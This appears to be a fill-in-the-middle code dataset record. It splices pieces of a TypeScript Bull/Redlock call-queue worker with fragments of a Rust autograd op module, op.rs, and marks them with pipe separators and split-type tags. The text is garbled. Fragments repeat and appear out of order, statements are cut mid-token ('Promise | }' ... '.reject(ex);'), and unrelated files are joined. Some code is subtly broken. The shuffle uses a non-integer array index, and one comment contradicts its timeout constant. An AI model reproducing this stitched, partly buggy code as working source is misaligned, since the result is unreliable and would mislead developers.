const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = newArray.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
// this.logger.info('=====roundRobinStrategy newArray=====', members, newArray, unlockedMember);
const member = this.cycleFind({ members: unlockedMember, tenantId });
return Promise.resolve(member);
} catch (ex) {
this.logger.error(ex);
return Promise.reject(ex);
}
}
async getLockedMembers({ tenantId }) {
try {
const regKey = `esl::queue::member::locked::${tenantId}::*`;
const keys = await this.redLockClient.keys(regKey);
const members = [];
keys.forEach(key => {
const items = key.split('::');
members.push(items[items.length - 1])
})
return Promise.resolve(members);
}
catch (ex) {
return Promise | }
}
async lockMember({ tenantId, member }) {
try {
const key = `esl::queue::member::locked::${tenantId}::${member}`;
//await redisQC.setnx(key, member);
// await redisQC.expire(key, 60);
const ttl = 3 * 1000;
const lock = await this.redlock.lock(key, ttl);
return Promise.resolve(lock);
}
catch (ex) {
return Promise.reject(ex);
}
}
async doneInComeCall(args: Job, queueIndex, timeout2: number) {
try {
const argData = args.data;
const { queue, tenantId, callId, timeout } = argData;
this.logger.info(`doneInComeCall ${tenantId}[${callId}]`);
const { members, queueNumber } = queue;
const eventName = `stopFindAgent::${tenantId}::${callId}`;
this.logger.debug('doneInComeCall', eventName);
let eslSendStop = false;
let maxTimeOut = false;
this.eventService.once(eventName, (data) => {
this.logger.info(`ESL Send Stop Job:${data.jobId} ,My Job Is: ${args.id}`);
if (data.jobId === args.id) {
eslSendStop = true;
}
})
const startTime = new Date().getTime();
let isMyTurn = false;
let pubData = null;
if (Array.isArray(members) && members.length > 0) {
while (!eslSendStop && !isMyTurn) {
const activeJobs = await this.queues[queueIndex].getActive();
this.logger.info(`activeJobs:${activeJobs.length}`);
isMyTurn = true;
for (let k = 0; k < activeJobs.length; k++) {
const actJob = activeJobs[k];
const actJobOpts = actJob.opts;
const actJobId = actJob.id;
const { priority, timestamp } = actJobOpts;
console.log(`myJob:[${args.id},${args.opts.priority},${args.opts.timestamp}],compareJob:[${actJobId},${priority},${timestamp}]`);
if (priority < args.opts.priority) {
this.logger.info('=============存在优先级比我高的=============');
isMyTurn = false;
await this.wait(1 * 1000);
break;
}
else if (priority === args.opts.priority && timestamp < args.opts.timestamp) {
this.logger.info('=============和我优先级别一样,但是比我进的早!===========');
isMyTurn = false;
await this.wait(1 * 1000);
break;
}
else {
await this.wait(1 * 1000);
}
}
}
while (!eslSendStop && !maxTimeOut) {
this.logger.info(`Job:[${tenantId} - ${args.id}] Finding A Queue Member IN [${members.join(',')}]!`);
const now = new Date().getTime();
if (now - startTime > timeout) {
this.logger.info(`doneInComeCall Timeout ${timeout}`);
maxTimeOut = true;
break;
}
let data = null;
switch (queue.queue.strategy) {
case 'round-robin':
{
data = await this.roundRobinStrategy({
members,
queueNumber,
tenantId
})
break;
}
case 'top-down':
{
data = await this.topDownStrategy({
members,
tenantId
})
break;
}
default:
{
data = await this.randomStrategy({
members,
tenantId
})
break;
}
}
if (data && data.accountCode) {
await this.lockMember({ tenantId, member: data.accountCode });
this.logger.info(`${tenantId} Find A Waiting Agent : ${data.accountCode}`);
pubData = {
tenantId,
callId,
accountCode: data ? data.accountCode : '',
agentId: data ? data.agentId : '',
phoneLogin: data ? data.phoneLogin : '',
phoneNumber: data ? data.phoneNumber : '',
loginType: data ? data.loginType : ''
}
await this.eventService.pubAReidsEvent('esl::callcontrol::queue::finded::member', JSON.stringify({
success: true,
tenantId,
callId,
data: pubData
}));
break;
}
else {
await this.wait(3 * 1000);
}
}
}
if (eslSendStop || maxTimeOut) {
const errinfo = { success: false, eslSendStop, maxTimeOut };
return Promise.reject(JSON.stringify(errinfo)); //这里只能是字符串
}
else {
return Promise.resolve({ success: true, data: pubData });
}
} catch (ex) {
this.logger.error('doneInComeCall Error:', ex);
return Promise.reject(ex);
}
}
createChildInjector(): void {
this.childInjector = ReflectiveInjector.resolveAndCreate([
TenantController,
PBXExtensionController,
PBXAgentController,
UserEventController,
], this.injector)
}
async wait(millisecond) {
try {
if (millisecond <= 0) {
millisecond = 3 * 1000;
}
await new Promise((resolve, reject) => {
setTimeout(() => {
resolve();
}, millisecond)
})
}
catch (ex) {
return Promise.reject(ex);
}
}
} | .reject(ex);
| identifier_name |
QueueWorkerService.ts | import { Injectable, Injector, ReflectiveInjector } from 'injection-js';
import BullQueue = require('bull');
import { Queue, Job, QueueOptions } from 'bull';
// import { deepstreamQuarantine } from 'deepstream.io-client-js';
import { LoggerService } from '../service/LogService';
import { ConfigService } from '../service/ConfigService';
import { RedisService } from '../service/RedisService'; | import { PBXExtensionController } from '../controllers/pbx_extension';
import { PBXAgentController } from '../controllers/pbx_agent';
import { UserEventController } from '../controllers/userEvent';
import { RedisOptions, Redis } from 'ioredis';
import Redlock = require('redlock');
import { Lock } from 'redlock';
@Injectable()
/**
* @description 用bull实现队列排队,以每一个组合的每一个队列为一个排队队列,包括插队等功能
*/
export class QueueWorkerService {
private queueTopics: string[];
private queues: Queue[]; // 此处算法可以改进
private childInjector: Injector;
private queueOptions: QueueOptions;
private redlock: Redlock;
private redLockClient: Redis;
private bullQueueClient: Redis;
private redisService: RedisService;
private eventService: EventService;
private pbxAgentController: PBXAgentController;
private pbxExtensionController: PBXExtensionController;
constructor(private injector: Injector, private logger: LoggerService, private config: ConfigService) {
this.createChildInjector();
this.eventService = this.injector.get(EventService);
this.pbxAgentController = this.childInjector.get(PBXAgentController);
this.pbxExtensionController = this.childInjector.get(PBXExtensionController);
}
async init() {
try {
this.redisService = this.injector.get(RedisService);
this.queueOptions = {
redis: {
host: this.config.getConfig().redis.host,
port: this.config.getConfig().redis.port,
password: this.config.getConfig().redis.password ? this.config.getConfig().redis.password : null,
db: 10,
},
prefix: 'esl_bull'
}
this.redLockClient = this.redisService.getClientByName('RedLock');
this.bullQueueClient = this.redisService.getClientByName('BullQueue');
this.redlock = new Redlock(
// you should have one client for each redis node
// in your cluster
[this.redLockClient],
{
// the expected clock drift; for more details
driftFactor: 0.01, // time in ms
// the max number of times Redlock will attempt to lock a resource before erroring
retryCount: 10,
// the time in ms between attempts
retryDelay: 200, // time in ms
// the max time in ms randomly added to retries
// to improve performance under high contention
// see https://www.awsarchitectureblog.com/2015/03/backoff.html
retryJitter: 200 // time in ms
});
this.redlock.on('clientError', function (err) {
this.logger.error('A redis error has occurred:', err);
})
this.queueTopics = [];
this.queues = []
} catch (ex) {
}
}
/**
*
* @param topic 以租户及队列名称组合的唯一的队列名,如果已经存在,返回
*/
add(tenantId: string, queueNumber: string): Queue {
const qNameTopic = `esl_q_queue::${tenantId}::${queueNumber}`;
if (this.queueTopics.indexOf(qNameTopic) < 0) {
const queue = new BullQueue(qNameTopic, this.queueOptions);
this.queueTopics.push(qNameTopic)
this.queues.push(queue);
this.setCacheBullKey(qNameTopic);
queue
.on('error', function (error) {
// An error occured.
console.log('bullqueue', error)
})
.on('active', function (job, jobPromise) {
// A job has started. You can use `jobPromise.cancel()`` to abort it.
console.log('bullqueue active', job.id, new Date())
})
.on('stalled', function (job) {
// A job has been marked as stalled. This is useful for debugging job
// workers that crash or pause the event loop.
console.log('bullqueue stalled', job.id, new Date())
})
.on('progress', function (job, progress) {
// A job's progress was updated!
console.log('bullqueue progress', job.id, new Date())
})
.on('global:progress', function (jobId, progress) {
console.log(`Job ${jobId} is ${progress * 100}% ready!`);
})
.on('completed', function (job, result) {
// A job successfully completed with a `result`.
console.log('in queueworker bullqueue completed', job.id, result)
})
.on('failed', function (job, err) {
// A job failed with reason `err`!
console.log('bullqueue failed', job.id)
// seneca.act({ role: 'pubsub', path: 'queue_job_fail', data: JSON.stringify({ id:job.id, data:job.data }) }, (err, rsp) => {
// console.log('bullqueue failed pubsub',err,rsp)
// })
})
.on('paused', function () {
// The queue has been paused.
console.log('bullqueue paused')
})
.on('resumed', function (job) {
// The queue has been resumed.
console.log('bullqueue resumed')
})
.on('cleaned', function (jobs, type) {
// Old jobs have been cleaned from the queue. `jobs` is an array of cleaned
// jobs, and `type` is the type of jobs cleaned.
console.log('bullqueue cleaned', type)
});
const queueIndex = this.queueTopics.length - 1;
queue.process((job,done) => {
const MaxDoneTime = 3 * 60 * 1000; // 最多执行30分钟
this.doneInComeCall(job, queueIndex, MaxDoneTime)
.then(res => {
this.logger.debug('doneInComeCall res:', res);
done(null,res);
})
.catch(err => {
this.logger.error('doneInComeCall error:', err);
done(err);
})
});
return queue;
} else {
return this.getQueueByName(qNameTopic);
}
}
getQueueByName(name: string): Queue {
try {
const index = this.queueTopics.indexOf(name);
if (index > -1) {
return this.queues[index];
} else {
return null;
}
}
catch (ex) {
this.logger.error('getQueueByName error:', ex);
}
}
async readyCacheBullQueue() {
try {
const keys: string[] = await this.bullQueueClient.keys('bullQueueCache*');
this.logger.debug('readyCacheBullQueue:', keys.join(','));
for (let i = 0; i < keys.length; i++) {
const key = keys[i] || 'bullQueueCache';
const works = key.split('::');
if (works.length === 4) {
this.add(works[2], works[3]);
}
}
return Promise.resolve();
}
catch (ex) {
this.logger.debug('readyCacheBullQueue error ', ex);
return Promise.reject(ex);
}
}
setCacheBullKey(name) {
this.logger.debug('Cache Bull Key : ', name);
this.bullQueueClient.set(`bullQueueCache::${name}`, 1)
.then()
.catch(err => {
this.logger.error('bullQueue set cache key error:', name);
})
}
/**
* @description
* shuffle算法,类似摸牌
* arr为原数组,cards为乱序结果数组
* random取一个index,取arr中这个元素,放入cards,同时移除arr中这个元素。
* @param originalArray 原始数组
* @return {Array}
*/
shuffle(originalArray: string[]) {
const mixedArray = [];
const copyArray = originalArray.slice(0); // 防止改变原来的参数,数组是引用传递
while (copyArray.length > 0) {
//generate a random index of the original array
const randomIndex = Math.random() * copyArray.length;
//push the random element into the mixed one, at the same time, delete the original element
mixedArray.push(copyArray[randomIndex]);
copyArray.splice(randomIndex, 1);
}
return mixedArray;
}
async randomStrategy({ members, tenantId }) {
try {
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = members.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
const membersRandom = this.shuffle(unlockedMember);
const member = this.cycleFind({ members: membersRandom, tenantId });
return Promise.resolve(member);
} catch (ex) {
this.logger.error('randomStrategy error:', ex);
return Promise.reject(ex);
}
}
/**
* @description
* 按队列中坐席的顺序从上到下一次查找可用的坐席
* 为什么要按members坐席的顺序来,因为实际应用中,这个顺序通常可以用来代表坐席的等级,一般技能卓越
* 的优秀坐席应该放在前面,以为客户提供最好的服务!
*
*/
async topDownStrategy({ members, tenantId }) {
try {
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = members.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
const member = this.cycleFind({ members: unlockedMember, tenantId });
return Promise.resolve(member);
}
catch (ex) {
this.logger.error('topDownStrategy error:', ex);
return Promise.reject(ex);
}
}
async cycleFind({ members, tenantId }) {
try {
let finded = null;
for (let i = 0; i < members.length; i++) {
//redis锁定成员
//检查是否可用
const member = `${members[i]}`;
finded = await this.pbxExtensionController.checkAgentCanDail(tenantId, member);
// this.logger.debug('find a member:', finded);
if (finded) break;
}
return Promise.resolve(finded);
}
catch (ex) {
this.logger.error('cycleFind error:', ex);
return Promise.reject(ex);
}
}
async roundRobinStrategy({ members, tenantId, queueNumber }) {
try {
const finds = await this.pbxAgentController.getRoundRobinAgents(tenantId, queueNumber);
let newArray = [];
if (finds && finds.length) {
const agent = finds[0];
if (agent && agent.agentNumber) {
const index = members.indexOf(Number(agent.agentNumber));
if (index > -1) {
const firstArray = members.slice(index + 1);
const lastArray = members.slice(0, index + 1);
newArray = firstArray.concat(lastArray);
}
else {
this.logger.info('AgentNumber Is Not Found In Queue Members!');
newArray = members.slice(0);
}
}
else {
this.logger.info('Agent Is Not Found In pbx_agents!');
newArray = members.slice(0);
}
} else {
newArray = members.slice(0);
}
const lockedMembers = await this.getLockedMembers({ tenantId });
const unlockedMember = newArray.filter(x => {
return lockedMembers.indexOf(String(x)) === -1
});
// this.logger.info('=====roundRobinStrategy newArray=====', members, newArray, unlockedMember);
const member = this.cycleFind({ members: unlockedMember, tenantId });
return Promise.resolve(member);
} catch (ex) {
this.logger.error(ex);
return Promise.reject(ex);
}
}
async getLockedMembers({ tenantId }) {
try {
const regKey = `esl::queue::member::locked::${tenantId}::*`;
const keys = await this.redLockClient.keys(regKey);
const members = [];
keys.forEach(key => {
const items = key.split('::');
members.push(items[items.length - 1])
})
return Promise.resolve(members);
}
catch (ex) {
return Promise.reject(ex);
}
}
async lockMember({ tenantId, member }) {
try {
const key = `esl::queue::member::locked::${tenantId}::${member}`;
//await redisQC.setnx(key, member);
// await redisQC.expire(key, 60);
const ttl = 3 * 1000;
const lock = await this.redlock.lock(key, ttl);
return Promise.resolve(lock);
}
catch (ex) {
return Promise.reject(ex);
}
}
async doneInComeCall(args: Job, queueIndex, timeout2: number) {
try {
const argData = args.data;
const { queue, tenantId, callId, timeout } = argData;
this.logger.info(`doneInComeCall ${tenantId}[${callId}]`);
const { members, queueNumber } = queue;
const eventName = `stopFindAgent::${tenantId}::${callId}`;
this.logger.debug('doneInComeCall', eventName);
let eslSendStop = false;
let maxTimeOut = false;
this.eventService.once(eventName, (data) => {
this.logger.info(`ESL Send Stop Job:${data.jobId} ,My Job Is: ${args.id}`);
if (data.jobId === args.id) {
eslSendStop = true;
}
})
const startTime = new Date().getTime();
let isMyTurn = false;
let pubData = null;
if (Array.isArray(members) && members.length > 0) {
while (!eslSendStop && !isMyTurn) {
const activeJobs = await this.queues[queueIndex].getActive();
this.logger.info(`activeJobs:${activeJobs.length}`);
isMyTurn = true;
for (let k = 0; k < activeJobs.length; k++) {
const actJob = activeJobs[k];
const actJobOpts = actJob.opts;
const actJobId = actJob.id;
const { priority, timestamp } = actJobOpts;
console.log(`myJob:[${args.id},${args.opts.priority},${args.opts.timestamp}],compareJob:[${actJobId},${priority},${timestamp}]`);
if (priority < args.opts.priority) {
this.logger.info('=============存在优先级比我高的=============');
isMyTurn = false;
await this.wait(1 * 1000);
break;
}
else if (priority === args.opts.priority && timestamp < args.opts.timestamp) {
this.logger.info('=============和我优先级别一样,但是比我进的早!===========');
isMyTurn = false;
await this.wait(1 * 1000);
break;
}
else {
await this.wait(1 * 1000);
}
}
}
while (!eslSendStop && !maxTimeOut) {
this.logger.info(`Job:[${tenantId} - ${args.id}] Finding A Queue Member IN [${members.join(',')}]!`);
const now = new Date().getTime();
if (now - startTime > timeout) {
this.logger.info(`doneInComeCall Timeout ${timeout}`);
maxTimeOut = true;
break;
}
let data = null;
switch (queue.queue.strategy) {
case 'round-robin':
{
data = await this.roundRobinStrategy({
members,
queueNumber,
tenantId
})
break;
}
case 'top-down':
{
data = await this.topDownStrategy({
members,
tenantId
})
break;
}
default:
{
data = await this.randomStrategy({
members,
tenantId
})
break;
}
}
if (data && data.accountCode) {
await this.lockMember({ tenantId, member: data.accountCode });
this.logger.info(`${tenantId} Find A Waiting Agent : ${data.accountCode}`);
pubData = {
tenantId,
callId,
accountCode: data ? data.accountCode : '',
agentId: data ? data.agentId : '',
phoneLogin: data ? data.phoneLogin : '',
phoneNumber: data ? data.phoneNumber : '',
loginType: data ? data.loginType : ''
}
await this.eventService.pubAReidsEvent('esl::callcontrol::queue::finded::member', JSON.stringify({
success: true,
tenantId,
callId,
data: pubData
}));
break;
}
else {
await this.wait(3 * 1000);
}
}
}
if (eslSendStop || maxTimeOut) {
const errinfo = { success: false, eslSendStop, maxTimeOut };
return Promise.reject(JSON.stringify(errinfo)); //这里只能是字符串
}
else {
return Promise.resolve({ success: true, data: pubData });
}
} catch (ex) {
this.logger.error('doneInComeCall Error:', ex);
return Promise.reject(ex);
}
}
createChildInjector(): void {
this.childInjector = ReflectiveInjector.resolveAndCreate([
TenantController,
PBXExtensionController,
PBXAgentController,
UserEventController,
], this.injector)
}
async wait(millisecond) {
try {
if (millisecond <= 0) {
millisecond = 3 * 1000;
}
await new Promise((resolve, reject) => {
setTimeout(() => {
resolve();
}, millisecond)
})
}
catch (ex) {
return Promise.reject(ex);
}
}
} | import { EventService } from '../service/EventService';
import { TenantController } from '../controllers/tenant'; | random_line_split |
op.rs | //! # Implementing differentiable operations
//!
//! Many of well-known ops are pre-defined in [crate::tensor_ops], but you can also
//! implement custom ops by hand.
//! See also [crate::tensor::TensorBuilder].
//!
//! ```
//! use ndarray;
//! use autograd as ag;
//! use autograd::op::OpError;
//! use autograd::tensor_ops::*;
//!
//! type NdArray<T: ag::Float> = ndarray::Array<T, ndarray::IxDyn>;
//!
//! // Implements `Op` trait for `Sigmoid`.
//! struct Sigmoid;
//!
//! impl<T: ag::Float> ag::op::Op<T> for Sigmoid {
//! fn compute(
//! &self,
//! ctx: &mut ag::op::ComputeContext<T>,
//! ) -> Result<(), OpError> {
//! let x: &ag::NdArrayView<_> = &ctx.input(0);
//! // Use `ndarray::Array::mapv` for element-wise computation.
//! let half = T::from(0.5).unwrap();
//! let y = x.mapv(move |a| ((a * half).tanh() * half) + half);
//! ctx.append_output(y);
//! Ok(())
//! }
//!
//! fn grad(&self, ctx: &mut ag::op::GradientContext<T>) {
//! // gradient of the output of Sigmoid
//! let gy = ctx.output_grad();
//! let y = ctx.output();
//! // gradient of the input of Sigmoid
//! let gx = gy * (y - square(y));
//! ctx.append_input_grad(Some(gx));
//! }
//! }
//!
//! // `sigmoid` function for end-user.
//! fn sigmoid<'graph, F: ag::Float>(x: &ag::Tensor<'graph, F>, g: &'graph ag::Context<F>)
//! -> ag::Tensor<'graph, F> {
//! ag::Tensor::builder(g)
//! .append_input(x, false)
//! .build(Sigmoid)
//! }
//! ```
//!
use std::any::type_name;
use std::fmt;
use std::marker::PhantomData;
use std::mem;
use crate::ndarray_ext::{NdArrayView, NdArrayViewMut, RawNdArrayView};
use crate::smallvec::SmallVec as RawSmallVec;
use crate::tensor::Tensor;
use crate::{Float, NdArray};
use crate::op::OpInput::NonVariable;
pub(crate) const DEFAULT_NUM_EDGES: usize = 2;
pub(crate) type SmallVec<T> = RawSmallVec<[T; DEFAULT_NUM_EDGES]>;
/// Error in `Op`'s computation.
#[derive(Clone, Debug, PartialEq)]
pub enum OpError {
NdArrayError(String, ndarray::ShapeError),
IncompatibleShape(String),
TypeUnsupported(String),
InvalidDims(String),
OutOfBounds(String),
}
impl std::error::Error for OpError {}
impl fmt::Display for OpError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
OpError::NdArrayError(pref, e) => write!(f, "{}: ", pref).and_then(|()| e.fmt(f)),
OpError::IncompatibleShape(s) => write!(f, "{}: ", s),
OpError::TypeUnsupported(s) => write!(f, "{}: ", s),
OpError::InvalidDims(s) => write!(f, "{}: ", s),
OpError::OutOfBounds(s) => write!(f, "{}: ", s),
}
}
}
/// Trait for tensor operations. `Tensor` structs wrap this.
pub trait Op<F: Float> {
/// Name of this op
fn name(&self) -> &'static str {
type_name::<Self>()
}
/// Runs this op with `ComputeContext`.
fn compute(&self, ctx: &mut ComputeContext<F>) -> Result<(), OpError>;
/// Returns gradients for input nodes by use of output's gradients etc.
fn grad(&self, ctx: &mut GradientContext<F>);
}
pub(crate) struct DummyOp<F: Float> {
pub phantom: PhantomData<F>,
}
impl<F: Float> DummyOp<F> {
#[allow(dead_code)]
pub(crate) fn new() -> Self {
DummyOp {
phantom: PhantomData,
}
}
}
impl<F: Float> Op<F> for DummyOp<F> {
fn compute(&self, _: &mut ComputeContext<F>) -> Result<(), OpError> {
Ok(())
}
fn grad(&self, _: &mut GradientContext<F>) {}
}
/// Wrapper for NdArrayView/NdArrayViewMut which is fed to `Op::compute`
///
/// Used in `Op::ComputeContext`.
pub(crate) enum OpInput<'v, T: Float> {
NonVariable(Option<NdArrayView<'v, T>>),
RdOnlyVariable(Option<NdArrayView<'v, T>>),
RdWrVariable(Option<NdArrayViewMut<'v, T>>),
}
/// `Op::compute`'s output
#[derive(Clone)]
pub(crate) enum OpOutput<T: Float> {
Owned(NdArray<T>),
View(RawNdArrayView<T>),
}
impl<'view, T: Float> OpInput<'view, T> {
#[inline]
/// Make a read-only input array
pub fn new_non_variable(x: NdArrayView<'view, T>) -> Self {
NonVariable(Some(x))
}
#[inline]
/// Make a read-only input array
pub fn new_rdonly_variable(x: NdArrayView<'view, T>) -> Self {
OpInput::RdOnlyVariable(Some(x))
}
#[inline]
/// Make a read/write input array
pub fn new_rdwr_variable(x: NdArrayViewMut<'view, T>) -> Self {
OpInput::RdWrVariable(Some(x))
}
}
/// Context of an `Op`'s computation phase.
///
/// # Example
///
/// ```
/// use autograd as ag;
///
/// // Implementing `Op` trait for `Sigmoid`.
/// struct Sigmoid;
///
/// impl<T: ag::Float> ag::op::Op<T> for Sigmoid {
/// fn compute(
/// &self,
/// ctx: &mut ag::op::ComputeContext<T>,
/// ) -> Result<(), ag::op::OpError> {
/// // Getting the first input array.
/// let x: &ag::NdArrayView<_> = &ctx.input(0);
/// let half = T::from(0.5).unwrap();
/// let y = x.mapv(move |a| ((a * half).tanh() * half) + half);
/// // Put the computed result.
/// ctx.append_output(y);
/// Ok(())
/// }
///
/// fn grad(&self, ctx: &mut ag::op::GradientContext<T>) { /* ... */ }
/// }
/// ```
pub struct ComputeContext<'v, T: Float> {
// Input arrays
xs: SmallVec<OpInput<'v, T>>,
// Output arrays
pub(crate) ys: SmallVec<OpOutput<T>>,
}
impl<'graph, 'view, T: Float> ComputeContext<'view, T> {
#[inline]
pub(crate) fn new(xs: SmallVec<OpInput<'view, T>>) -> Self {
ComputeContext {
xs,
ys: SmallVec::new(),
}
}
/// Grabs the `i` th input array as a *read-only* array view.
///
/// Calling `input(i)` more than once causes panic.
#[inline]
pub fn input(&mut self, i: usize) -> NdArrayView<'view, T> {
let x = match self.xs.get_mut(i) {
Some(x) => x,
None => panic!("Bad op impl: input index out of range."),
};
match x {
NonVariable(ref mut a) => match a.take() {
Some(ret) => ret,
None => panic!(
"Bad op impl: input({})/input_mut({}) cannot be called twice",
i, i
),
},
OpInput::RdOnlyVariable(ref mut a) => match a.take() {
Some(ret) => ret,
None => panic!(
"Bad op impl: input({})/input_mut({}) cannot be called twice",
i, i
),
},
OpInput::RdWrVariable(_) => {
panic!(
"Bad op impl: cannot perform mutable borrowing for input({}). Use input_mut() instead.",
i
);
}
}
}
/// Grabs the `i` th input array as a *read-write* array view.
///
/// Calling `input_mut(i)` more than once causes panic.
#[inline]
pub fn input_mut(&mut self, i: usize) -> NdArrayViewMut<'view, T> {
let x = match self.xs.get_mut(i) {
Some(x) => x,
None => panic!("Bad op impl: {}'s input doesn't exist.", i),
};
match x {
OpInput::RdWrVariable(ref mut a) => match a.take() {
Some(ret) => ret,
None => panic!(
"Bad op impl: input({})/input_mut({}) cannot be called twice",
i, i
),
},
_ => {
panic!(
"Bad op impl: cannot perform mutable borrowing for input({})",
i
);
}
}
}
/// Appends an `ndarray::ArrayView` to the back of the output list of the current op.
///
/// NOTE: Implementor of `Op::compute` must not forget to call `append_*` as many as the number of its output in `Op::compute`, otherwise panic occurs.
#[inline]
pub fn append_output_view(&mut self, y: NdArrayView<'view, T>) {
self.append_output_view_raw(y.raw_view());
}
/// Appends an `ndarray::ArrayView` to the back of the output list of the current op.
///
/// NOTE: Implementor of `Op::compute` must not forget to call `append_*` as many as the number of its output in `Op::compute`, otherwise panic occurs.
#[inline]
pub(crate) fn append_output_view_raw(&mut self, y: RawNdArrayView<T>) {
let mut contains_variable_input= false;
for x in &self.xs {
match x {
NonVariable(_) => {},
_ => contains_variable_input = true
}
}
if contains_variable_input {
// copy it beforehand to avoid use-after-free
self.ys.push(OpOutput::Owned(unsafe { y.deref_into_view().to_owned() }));
} else {
self.ys.push(OpOutput::View(y));
}
}
#[inline]
pub fn append_empty_output(&mut self) {
self.ys.push(OpOutput::Owned(NdArray::zeros(
crate::ndarray::IxDyn(&[]),
)));
}
/// Appends an ndarray to the back of the output list of the current op.
///
/// NOTE: Implementor of `Op::compute` must not forget to call `append_*` as many as the number of its output in `Op::compute`, otherwise panic occurs.
#[inline]
pub fn append_output(&mut self, y: NdArray<T>) {
self.ys.push(OpOutput::Owned(y));
}
/// Returns a number of input arrays.
#[inline]
pub fn num_inputs(&self) -> usize {
self.xs.len()
}
}
/// Context of an `Op`'s gradient propagation phase.
///
/// This is passed to an `Op` through `Op::grad`.
/// `Op::grad` should provide the gradients of its inputs by calling `GradientContext::append_input_grad`.
///
/// Use `graph()` to access `Graph` object for tensor computations.
///
/// ```
/// use autograd as ag;
/// use ag::tensor_ops as T;
///
/// struct Sigmoid;
///
/// impl<F: ag::Float> ag::op::Op<F> for Sigmoid {
/// fn compute(&self, ctx: &mut ag::op::ComputeContext<F>) -> Result<(), ag::op::OpError> {
/// /* ... */
/// Ok(())
/// }
///
/// fn grad(&self, ctx: &mut ag::op::GradientContext<F>) {
/// // gradient of the input of Sigmoid
/// let gy = ctx.output_grad();
/// // output tensor
/// let y = ctx.output();
/// // `Tensor` computations
/// let gx = gy * (y - T::square(y));
/// // Propagates input's gradient.
/// ctx.append_input_grad(Some(gx));
/// }
/// }
/// ```
pub struct GradientContext<'graph, T: Float> {
gy: Tensor<'graph, T>,
y: Tensor<'graph, T>,
graph: &'graph crate::graph::Graph<T>,
gxs: SmallVec<Option<Tensor<'graph, T>>>,
}
impl<'graph, T: Float> GradientContext<'graph, T> {
#[inline]
pub(crate) fn new(
gy: Tensor<'graph, T>,
y: Tensor<'graph, T>,
graph: &'graph crate::graph::Graph<T>,
) -> Self |
// Call Op::grad and return `gxs`
pub(crate) fn compute_input_grads(mut self) -> SmallVec<Option<Tensor<'graph, T>>> {
let id = self.y.id;
// steal op
let stolen = self.graph().access_inner_mut(id).op.take().unwrap();
// call Op::grad
stolen.grad(&mut self);
// restore
mem::swap(&mut self.graph().access_inner_mut(id).op, &mut Some(stolen));
debug_assert!(
!self.gxs.is_empty(),
"Bad Op impl: GradientContext::append_input_grad was not called"
);
self.gxs
}
/// Returns the gradient of the op's output.
#[inline]
pub fn output_grad(&self) -> Tensor<'graph, T> {
self.gy
}
/// Grabs the output of the op.
#[inline]
pub fn output(&self) -> Tensor<'graph, T> {
self.y
}
/// Returns input tensors.
#[inline]
pub fn inputs(&self) -> SmallVec<Tensor<'graph, T>> {
let mut ret = SmallVec::new();
for input in self.y.get_incoming_tensors().iter() {
ret.push(self.graph.tensor(input.id));
}
ret
}
/// Grabs the `i` th input tensor.
#[inline]
pub fn input(&self, i: usize) -> Tensor<'graph, T> {
return self
.y
.get_incoming_tensor(i, self.graph)
.expect("bad Op::grad impl");
}
/// Returns the number of inputs.
#[inline]
pub fn num_inputs(&self) -> usize {
self.y.inner().incoming_nodes.len()
}
/// Returns a graph object that is usable for tensor computations in the context.
#[inline]
pub fn graph(&self) -> &'graph crate::graph::Graph<T> {
self.graph
}
/// Back-propagates the input's gradient.
///
/// Appends the given tensor to the back of the input-gradient-list.
/// `None` argument indicates that the `Op`'s input doesn't have gradient.
/// Note that `Op::grad` must call this function as many as `num_inputs()`.
#[inline]
pub fn append_input_grad(&mut self, gx: Option<Tensor<'graph, T>>) {
self.gxs.push(gx);
}
}
| {
GradientContext {
gy,
y,
graph,
gxs: SmallVec::new(),
}
} | identifier_body |
op.rs | //! # Implementing differentiable operations
//!
//! Many of well-known ops are pre-defined in [crate::tensor_ops], but you can also
//! implement custom ops by hand.
//! See also [crate::tensor::TensorBuilder].
//!
//! ```
//! use ndarray;
//! use autograd as ag;
//! use autograd::op::OpError;
//! use autograd::tensor_ops::*;
//!
//! type NdArray<T: ag::Float> = ndarray::Array<T, ndarray::IxDyn>;
//!
//! // Implements `Op` trait for `Sigmoid`.
//! struct Sigmoid;
//!
//! impl<T: ag::Float> ag::op::Op<T> for Sigmoid {
//! fn compute(
//! &self,
//! ctx: &mut ag::op::ComputeContext<T>,
//! ) -> Result<(), OpError> {
//! let x: &ag::NdArrayView<_> = &ctx.input(0);
//! // Use `ndarray::Array::mapv` for element-wise computation.
//! let half = T::from(0.5).unwrap();
//! let y = x.mapv(move |a| ((a * half).tanh() * half) + half);
//! ctx.append_output(y);
//! Ok(())
//! }
//!
//! fn grad(&self, ctx: &mut ag::op::GradientContext<T>) {
//! // gradient of the output of Sigmoid
//! let gy = ctx.output_grad();
//! let y = ctx.output();
//! // gradient of the input of Sigmoid
//! let gx = gy * (y - square(y));
//! ctx.append_input_grad(Some(gx));
//! }
//! }
//!
//! // `sigmoid` function for end-user.
//! fn sigmoid<'graph, F: ag::Float>(x: &ag::Tensor<'graph, F>, g: &'graph ag::Context<F>)
//! -> ag::Tensor<'graph, F> {
//! ag::Tensor::builder(g)
//! .append_input(x, false)
//! .build(Sigmoid)
//! }
//! ```
//!
use std::any::type_name;
use std::fmt;
use std::marker::PhantomData;
use std::mem;
use crate::ndarray_ext::{NdArrayView, NdArrayViewMut, RawNdArrayView};
use crate::smallvec::SmallVec as RawSmallVec;
use crate::tensor::Tensor;
use crate::{Float, NdArray};
use crate::op::OpInput::NonVariable;
pub(crate) const DEFAULT_NUM_EDGES: usize = 2;
pub(crate) type SmallVec<T> = RawSmallVec<[T; DEFAULT_NUM_EDGES]>;
/// Error in `Op`'s computation.
#[derive(Clone, Debug, PartialEq)]
pub enum | {
NdArrayError(String, ndarray::ShapeError),
IncompatibleShape(String),
TypeUnsupported(String),
InvalidDims(String),
OutOfBounds(String),
}
impl std::error::Error for OpError {}
impl fmt::Display for OpError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
OpError::NdArrayError(pref, e) => write!(f, "{}: ", pref).and_then(|()| e.fmt(f)),
OpError::IncompatibleShape(s) => write!(f, "{}: ", s),
OpError::TypeUnsupported(s) => write!(f, "{}: ", s),
OpError::InvalidDims(s) => write!(f, "{}: ", s),
